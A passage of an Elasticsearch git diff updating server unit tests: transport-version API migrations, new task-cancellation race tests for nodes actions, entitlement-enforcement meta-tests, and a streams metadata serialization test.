ClusterName("test")).build(), + task, + SearchResponse.Clusters.EMPTY, + null, + false + ) { + @Override + protected SearchPhase getNextPhase() { + return new SearchPhase("test") { + @Override + protected void run() { + latch.countDown(); + } + }; + } + + @Override + void onShardFailure(int shardIndex, SearchShardTarget shardTarget, Exception e) { + latch.countDown(); + fail(e, "Unexpected shard failure"); + } + }; + action.start(); + latch.await(); + assertThat(successfulOps.get(), equalTo(numShards)); + SearchPhaseController.ReducedQueryPhase phase = action.results.reduce(); + assertThat(phase.numReducePhases(), greaterThanOrEqualTo(1)); + assertThat(phase.totalHits().value(), equalTo(2L)); + } + } + } diff --git a/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java b/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java index 4346351c1576c..ab6e39239e6e8 100644 --- a/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/TransportSearchActionTests.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.TotalHits; import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.LatchedActionListener; import org.elasticsearch.action.MockResolvedIndices; @@ -1737,7 +1736,7 @@ public void testCCSCompatibilityCheck() throws Exception { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); ThreadPool threadPool = new ThreadPool(settings, MeterRegistry.NOOP, new
DefaultBuiltInExecutorBuilders()); try { TransportService transportService = MockTransportService.createNewService( diff --git a/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java b/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java index f954019d5556d..d62432c2ee4cd 100644 --- a/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/support/nodes/TransportNodesActionTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.action.support.nodes; import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.FailedNodeException; import org.elasticsearch.action.support.ActionFilters; @@ -57,6 +58,8 @@ import java.util.List; import java.util.Map; import java.util.Set; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; import java.util.concurrent.Executor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicInteger; @@ -66,7 +69,9 @@ import static java.util.Collections.emptyMap; import static org.elasticsearch.test.ClusterServiceUtils.createClusterService; import static org.elasticsearch.test.ClusterServiceUtils.setState; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.hasSize; import static org.mockito.Mockito.mock; public class TransportNodesActionTests extends ESTestCase { @@ -316,6 +321,137 @@ protected Object createActionContext(Task task, TestNodesRequest request) { assertTrue(cancellableTask.isCancelled()); // keep task alive } + public void testCompletionShouldNotBeInterferedByCancellationAfterProcessingBegins() throws Exception { + final var barrier = new CyclicBarrier(2); + final var action = new TestTransportNodesAction( + clusterService, + transportService, + new ActionFilters(Set.of()), + TestNodeRequest::new, + THREAD_POOL.executor(ThreadPool.Names.GENERIC) + ) { + @Override + protected void newResponseAsync( + Task task, + TestNodesRequest request, + Void unused, + List<TestNodeResponse> testNodeResponses, + List<FailedNodeException> failures, + ActionListener<TestNodesResponse> listener + ) { + boolean waited = false; + // Process node responses in a loop and ensure no ConcurrentModificationException will be thrown due to + // concurrent cancellation coming after the loop has started, see also #128852 + for (var response : testNodeResponses) { + if (waited == false) { + waited = true; + safeAwait(barrier); + safeAwait(barrier); + } + } + super.newResponseAsync(task, request, unused, testNodeResponses, failures, listener); + } + }; + + final CancellableTask cancellableTask = new CancellableTask(randomLong(), "transport", "action", "", null, emptyMap()); + final var cancelledFuture = new PlainActionFuture<Void>(); + cancellableTask.addListener(() -> cancelledFuture.onResponse(null)); + + final PlainActionFuture<TestNodesResponse> future = new PlainActionFuture<>(); + action.execute(cancellableTask, new TestNodesRequest(), future); + + for (var capturedRequest : transport.getCapturedRequestsAndClear()) { + completeOneRequest(capturedRequest); + } + + // Wait for the overall response to start processing the node responses in a loop and then cancel the task. + // The cancellation should not interfere with the node response processing.
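+ // The two-party barrier pairs twice with the overridden newResponseAsync above: once here, proving response + // processing has begun, and once after the cancellation below, allowing that processing to complete.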
+ safeAwait(barrier); + TaskCancelHelper.cancel(cancellableTask, "simulated"); + safeGet(cancelledFuture); + + // Let the process continue, and it should be successful + safeAwait(barrier); + assertResponseReleased(safeGet(future)); + } + + public void testConcurrentlyCompletionAndCancellation() throws InterruptedException { + final var action = getTestTransportNodesAction(); + + final CountDownLatch onCancelledLatch = new CountDownLatch(1); + final CancellableTask cancellableTask = new CancellableTask(randomLong(), "transport", "action", "", null, emptyMap()) { + @Override + protected void onCancelled() { + onCancelledLatch.countDown(); + } + }; + + final PlainActionFuture<TestNodesResponse> future = new PlainActionFuture<>(); + action.execute(cancellableTask, new TestNodesRequest(), future); + + final List<TestNodeResponse> nodeResponses = new ArrayList<>(); + final CapturingTransport.CapturedRequest[] capturedRequests = transport.getCapturedRequestsAndClear(); + for (int i = 0; i < capturedRequests.length - 1; i++) { + final var capturedRequest = capturedRequests[i]; + nodeResponses.add(completeOneRequest(capturedRequest)); + } + + final var raceBarrier = new CyclicBarrier(3); + final Thread completeThread = new Thread(() -> { + safeAwait(raceBarrier); + nodeResponses.add(completeOneRequest(capturedRequests[capturedRequests.length - 1])); + }); + final Thread cancelThread = new Thread(() -> { + safeAwait(raceBarrier); + TaskCancelHelper.cancel(cancellableTask, "simulated"); + }); + completeThread.start(); + cancelThread.start(); + safeAwait(raceBarrier); + + // We expect either a successful response or a cancellation exception. All node responses should be released in both cases. + try { + final var testNodesResponse = future.actionGet(SAFE_AWAIT_TIMEOUT); + assertThat(testNodesResponse.getNodes(), hasSize(capturedRequests.length)); + assertResponseReleased(testNodesResponse); + } catch (Exception e) { + final var taskCancelledException = (TaskCancelledException) ExceptionsHelper.unwrap(e, TaskCancelledException.class); + assertNotNull("expect task cancellation exception, but got\n" + ExceptionsHelper.stackTrace(e), taskCancelledException); + assertThat(e.getMessage(), containsString("task cancelled [simulated]")); + assertTrue(cancellableTask.isCancelled()); + safeAwait(onCancelledLatch); // wait for the latch, the listener for releasing node responses is called before it + assertTrue(nodeResponses.stream().allMatch(r -> r.hasReferences() == false)); + } + + completeThread.join(10_000); + cancelThread.join(10_000); + assertFalse(completeThread.isAlive()); + assertFalse(cancelThread.isAlive()); + } + + private void assertResponseReleased(TestNodesResponse response) { + final var allResponsesReleasedListener = new SubscribableListener<Void>(); + try (var listeners = new RefCountingListener(allResponsesReleasedListener)) { + response.addCloseListener(listeners.acquire()); + for (final var nodeResponse : response.getNodes()) { + nodeResponse.addCloseListener(listeners.acquire()); + } + } + safeAwait(allResponsesReleasedListener); + assertTrue(response.getNodes().stream().noneMatch(TestNodeResponse::hasReferences)); + assertFalse(response.hasReferences()); + } + + private TestNodeResponse completeOneRequest(CapturingTransport.CapturedRequest capturedRequest) { + final var response = new TestNodeResponse(capturedRequest.node()); + try { + transport.getTransportResponseHandler(capturedRequest.requestId()).handleResponse(response); + } finally { + response.decRef(); + } + return response; + } + @BeforeClass public static void
startThreadPool() { THREAD_POOL = new TestThreadPool(TransportNodesActionTests.class.getSimpleName()); diff --git a/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java new file mode 100644 index 0000000000000..2ea51461fb528 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/EntitlementMetaTests.java @@ -0,0 +1,57 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; +import org.elasticsearch.test.ESTestCase; + +import java.io.IOException; +import java.nio.file.Path; + +/** + * Ensures that unit tests are subject to entitlement checks. + * This is a "meta test" because it tests that the tests are working: + * if these tests fail, it means other tests won't be correctly detecting + * entitlement enforcement errors. + *
<p>
+ * It may seem strange to have this test where it is, rather than in the entitlement library. + * There's a reason for that. + *
<p>
+ * To exercise entitlement enforcement, we must attempt an operation that should be denied. + * This necessitates some operation that fails the entitlement check, + * and it must be in production code (or else we'd also need {@link WithEntitlementsOnTestCode}, + * and we don't want to require that here). + * Naturally, there are very few candidates, because most code doesn't fail entitlement checks: + * really just the entitlement self-test we do at startup. Hence, that's what we use here. + *
<p>
+ * Since we want to call the self-test, which is in the server, we can't call it + * from a place like the entitlement library tests, because those deliberately do not + * have a dependency on the server code. Hence, this test lives here in the server tests. + * + * @see WithoutEntitlementsMetaTests + * @see WithEntitlementsOnTestCodeMetaTests + */ +public class EntitlementMetaTests extends ESTestCase { + public void testSelfTestPasses() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + Elasticsearch.entitlementSelfTest(); + } + + /** + * Unless {@link WithEntitlementsOnTestCode} is specified, sensitive methods can + * be called from test code. + */ + @SuppressForbidden(reason = "Testing that a forbidden API is allowed under these circumstances") + public void testForbiddenActionAllowedInTestCode() throws IOException { + // If entitlements were enforced, this would throw. + Path.of(".").toRealPath(); + } +} diff --git a/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java new file mode 100644 index 0000000000000..a91a2b5d4aeca --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/WithEntitlementsOnTestCodeMetaTests.java @@ -0,0 +1,42 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; +import org.elasticsearch.entitlement.runtime.api.NotEntitledException; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithEntitlementsOnTestCode; + +import java.nio.file.Path; + +/** + * A version of {@link EntitlementMetaTests} that tests {@link WithEntitlementsOnTestCode}. + * + * @see EntitlementMetaTests + * @see WithoutEntitlementsMetaTests + */ +@WithEntitlementsOnTestCode +public class WithEntitlementsOnTestCodeMetaTests extends ESTestCase { + /** + * {@link WithEntitlementsOnTestCode} should not affect this, since the sensitive method + * is called from server code. The self-test should pass as usual. + */ + public void testSelfTestPasses() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + Elasticsearch.entitlementSelfTest(); + } + + @SuppressForbidden(reason = "Testing that a forbidden API is disallowed") + public void testForbiddenActionDenied() { + assumeTrue("Not yet working in serverless", TestEntitlementBootstrap.isEnabledForTests()); + assertThrows(NotEntitledException.class, () -> Path.of(".").toRealPath()); + } +} diff --git a/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java b/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java new file mode 100644 index 0000000000000..8ec9116a97ab8 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/bootstrap/WithoutEntitlementsMetaTests.java @@ -0,0 +1,43 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. 
under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.bootstrap; + +import org.elasticsearch.core.SuppressForbidden; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; + +import java.io.IOException; +import java.nio.file.Path; + +/** + * A version of {@link EntitlementMetaTests} that tests {@link WithoutEntitlements}. + * + * @see EntitlementMetaTests + * @see WithEntitlementsOnTestCodeMetaTests + */ +@WithoutEntitlements +public class WithoutEntitlementsMetaTests extends ESTestCase { + /** + * Without enforcement of entitlements, {@link Elasticsearch#entitlementSelfTest} will fail and throw. + */ + public void testSelfTestFails() { + assertThrows(IllegalStateException.class, Elasticsearch::entitlementSelfTest); + } + + /** + * A forbidden action called from test code should be allowed, + * with or without {@link WithoutEntitlements}. + */ + @SuppressForbidden(reason = "Testing that a forbidden API is allowed under these circumstances") + public void testForbiddenActionAllowed() throws IOException { + // If entitlements were enforced, this would throw + Path.of(".").toRealPath(); + } +} diff --git a/server/src/test/java/org/elasticsearch/cli/TerminalTests.java b/server/src/test/java/org/elasticsearch/cli/TerminalTests.java index 812e2375bf172..d9542111afdca 100644 --- a/server/src/test/java/org/elasticsearch/cli/TerminalTests.java +++ b/server/src/test/java/org/elasticsearch/cli/TerminalTests.java @@ -10,12 +10,14 @@ package org.elasticsearch.cli; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import java.io.StringReader; import static org.elasticsearch.cli.Terminal.readLineToCharArray; import static org.hamcrest.Matchers.equalTo; +@WithoutEntitlements // test & cli only - never running with entitlements enabled public class TerminalTests extends ESTestCase { public void testVerbosity() throws Exception { diff --git a/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java b/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java index 9d9a3c17e286d..1968e1151b479 100644 --- a/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/ClusterStateTests.java @@ -9,7 +9,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.indices.rollover.RolloverInfo; import org.elasticsearch.cluster.block.ClusterBlock; @@ -2053,7 +2052,7 @@ private static void writeChunks(ClusterState clusterState, XContentBuilder build } public void testGetMinTransportVersion() throws IOException { - assertEquals(TransportVersions.MINIMUM_COMPATIBLE, ClusterState.EMPTY_STATE.getMinTransportVersion()); + assertEquals(TransportVersion.minimumCompatible(), ClusterState.EMPTY_STATE.getMinTransportVersion()); var builder = ClusterState.builder(buildClusterState()); int numNodes = randomIntBetween(2, 20); @@ -2069,7 +2068,7 @@ public void testGetMinTransportVersion() throws IOException { 
assertThat(newState.getMinTransportVersion(), equalTo(minVersion)); assertEquals( - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), ClusterState.builder(newState) .blocks(ClusterBlocks.builder().addGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK)) .build() diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java index cb4aae41924dd..a495b39bdee14 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/CoordinatorTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.core.LogEvent; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.SimpleDiffable; @@ -1590,7 +1589,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java index c2cf7adacf01d..1680d436ba647 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/ElasticsearchNodeCommandTests.java @@ -28,6 +28,7 @@ import org.elasticsearch.index.Index; import org.elasticsearch.indices.IndicesModule; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.elasticsearch.test.TestClusterCustomMetadata; import org.elasticsearch.test.TestProjectCustomMetadata; import org.elasticsearch.xcontent.NamedXContentRegistry; @@ -46,6 +47,7 @@ import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.not; +@WithoutEntitlements // commands don't run with entitlements enforced public class ElasticsearchNodeCommandTests extends ESTestCase { public void testLoadStateWithoutMissingCustomsButPreserved() throws IOException { diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java index 6672815c8dbcd..4179a6d3958ea 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/JoinHelperTests.java @@ -28,7 +28,6 @@ import org.elasticsearch.indices.breaker.NoneCircuitBreakerService; import org.elasticsearch.monitor.StatusInfo; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -74,8 +73,7 @@ public void testJoinDeduplication() { x -> localNode, clusterSettings, new ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); JoinHelper joinHelper = new JoinHelper( null, @@ -241,8 +239,7 @@ public void testJoinFailureOnUnhealthyNodes() { x -> localNode, clusterSettings, new 
ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); AtomicReference nodeHealthServiceStatus = new AtomicReference<>(new StatusInfo(UNHEALTHY, "unhealthy-info")); JoinHelper joinHelper = new JoinHelper( @@ -319,8 +316,7 @@ public void testLatestStoredStateFailure() { x -> localNode, clusterSettings, new ClusterConnectionManager(Settings.EMPTY, capturingTransport, threadPool.getThreadContext()), - taskManger, - Tracer.NOOP + taskManger ); JoinHelper joinHelper = new JoinHelper( null, diff --git a/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java b/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java index 94146071773a4..e60d7caaccbc4 100644 --- a/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/coordination/PublicationTransportHandlerTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.ClusterState; @@ -236,7 +235,7 @@ public RecyclerBytesStreamOutput newNetworkBytesStream() { allNodes.add(node); nodeTransports.put( node, - TransportVersionUtils.randomVersionBetween(random(), TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()) + TransportVersionUtils.randomVersionBetween(random(), TransportVersion.minimumCompatible(), TransportVersion.current()) ); } diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java index e847273cd660a..268c9065fe7ea 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/IndexAbstractionTests.java @@ -201,13 +201,18 @@ private IndexMetadata newIndexMetadata(String indexName, AliasMetadata aliasMeta private static DataStream newDataStreamInstance(List backingIndices, List failureStoreIndices) { boolean isSystem = randomBoolean(); + boolean isReplicated = randomBoolean(); return DataStream.builder(randomAlphaOfLength(50), backingIndices) - .setFailureIndices(DataStream.DataStreamIndices.failureIndicesBuilder(failureStoreIndices).build()) + .setFailureIndices( + DataStream.DataStreamIndices.failureIndicesBuilder(failureStoreIndices) + .setRolloverOnWrite(isReplicated == false && failureStoreIndices.isEmpty()) + .build() + ) .setGeneration(randomLongBetween(1, 1000)) .setMetadata(Map.of()) .setSystem(isSystem) .setHidden(isSystem || randomBoolean()) - .setReplicated(randomBoolean()) + .setReplicated(isReplicated) .build(); } } diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java index 5bf619e964e0b..db501f740b64f 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/MetadataRepositoriesMetadataTests.java @@ -348,7 +348,7 @@ public EnumSet context() { @Override public TransportVersion getMinimalSupportedVersion() { - return 
TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java index c39b5caeebce1..3f33f7824275c 100644 --- a/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/ProjectMetadataTests.java @@ -286,7 +286,7 @@ public void testToXContent() throws IOException { "system": false, "allow_custom_routing": false, "settings" : { }, - "failure_rollover_on_write": false, + "failure_rollover_on_write": true, "rollover_on_write": false } }, @@ -553,7 +553,7 @@ public void testToXContentMultiProject() throws IOException { "system": false, "allow_custom_routing": false, "settings" : { }, - "failure_rollover_on_write": false, + "failure_rollover_on_write": true, "rollover_on_write": false } }, diff --git a/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java b/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java new file mode 100644 index 0000000000000..033814048a36c --- /dev/null +++ b/server/src/test/java/org/elasticsearch/cluster/metadata/StreamsMetadataTests.java @@ -0,0 +1,38 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.cluster.metadata; + +import org.elasticsearch.common.io.stream.Writeable; +import org.elasticsearch.test.AbstractChunkedSerializingTestCase; +import org.elasticsearch.xcontent.XContentParser; + +import java.io.IOException; + +public class StreamsMetadataTests extends AbstractChunkedSerializingTestCase<StreamsMetadata> { + @Override + protected StreamsMetadata doParseInstance(XContentParser parser) throws IOException { + return StreamsMetadata.fromXContent(parser); + } + + @Override + protected Writeable.Reader<StreamsMetadata> instanceReader() { + return StreamsMetadata::new; + } + + @Override + protected StreamsMetadata createTestInstance() { + return new StreamsMetadata(randomBoolean()); + } + + @Override + protected StreamsMetadata mutateInstance(StreamsMetadata instance) throws IOException { + return new StreamsMetadata(instance.logsEnabled == false); + } +} diff --git a/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java b/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java index 52a2f391f1fb0..ae1357a4bca2c 100644 --- a/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/serialization/ClusterSerializationTests.java @@ -172,7 +172,7 @@ public void testRoutingTableSerialization() throws Exception { public void testSnapshotDeletionsInProgressSerialization() throws Exception { TransportVersion version = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); @@ -412,7 +412,7 @@ public static NamedDiff readDiffFrom(StreamInput in) throws IOException @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } @@ -451,7 +451,7 @@ public void testCustomSerialization() throws Exception { // serialize with minimum compatible version outStream = new BytesStreamOutput(); - version = TransportVersions.MINIMUM_COMPATIBLE; + version = TransportVersion.minimumCompatible(); outStream.setTransportVersion(version); diffs.writeTo(outStream); inStream = outStream.bytes().streamInput(); diff --git a/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java b/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java index 3704c0df7678e..8647887b625e6 100644 --- a/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java +++ b/server/src/test/java/org/elasticsearch/cluster/version/CompatibilityVersionsTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.version; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.indices.SystemIndexDescriptor; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -28,12 +27,12 @@ public class CompatibilityVersionsTests extends ESTestCase { public void testEmptyVersionsList() { assertThat( CompatibilityVersions.minimumVersions(List.of()), - equalTo(new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of())) + equalTo(new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of())) ); } public void testMinimumTransportVersions() { - TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_COMPATIBLE, true); + TransportVersion version1 =
TransportVersionUtils.getNextVersion(TransportVersion.minimumCompatible(), true); TransportVersion version2 = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getNextVersion(version1, true), @@ -80,7 +79,7 @@ public void testMinimumMappingsVersions() { * complaint. */ public void testMinimumsAreMerged() { - TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_COMPATIBLE, true); + TransportVersion version1 = TransportVersionUtils.getNextVersion(TransportVersion.minimumCompatible(), true); TransportVersion version2 = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getNextVersion(version1, true), diff --git a/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java b/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java index 3c8fa14267524..5603ddf647db1 100644 --- a/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java +++ b/server/src/test/java/org/elasticsearch/common/io/stream/DelayableWriteableTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.common.io.stream; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -205,7 +204,7 @@ protected NamedWriteableRegistry writableRegistry() { private static TransportVersion randomOldVersion() { return TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersion.current()) ); } diff --git a/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java b/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java index 38485e9e8c2e9..6117025f74982 100644 --- a/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java +++ b/server/src/test/java/org/elasticsearch/common/io/stream/VersionCheckingStreamOutputTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.common.io.stream; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; @@ -38,7 +37,7 @@ public TransportVersion getMinimalSupportedVersion() { public void testCheckVersionCompatibility() throws IOException { TransportVersion streamVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersion.current()) ); try (VersionCheckingStreamOutput out = new VersionCheckingStreamOutput(streamVersion)) { diff --git a/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java b/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java index 47026fe713c5c..253abcf93dace 100644 --- a/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java +++ b/server/src/test/java/org/elasticsearch/common/settings/ScopedSettingsTests.java @@ -20,6 +20,7 @@ import org.elasticsearch.index.IndexModule; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.elasticsearch.transport.TransportSettings; 
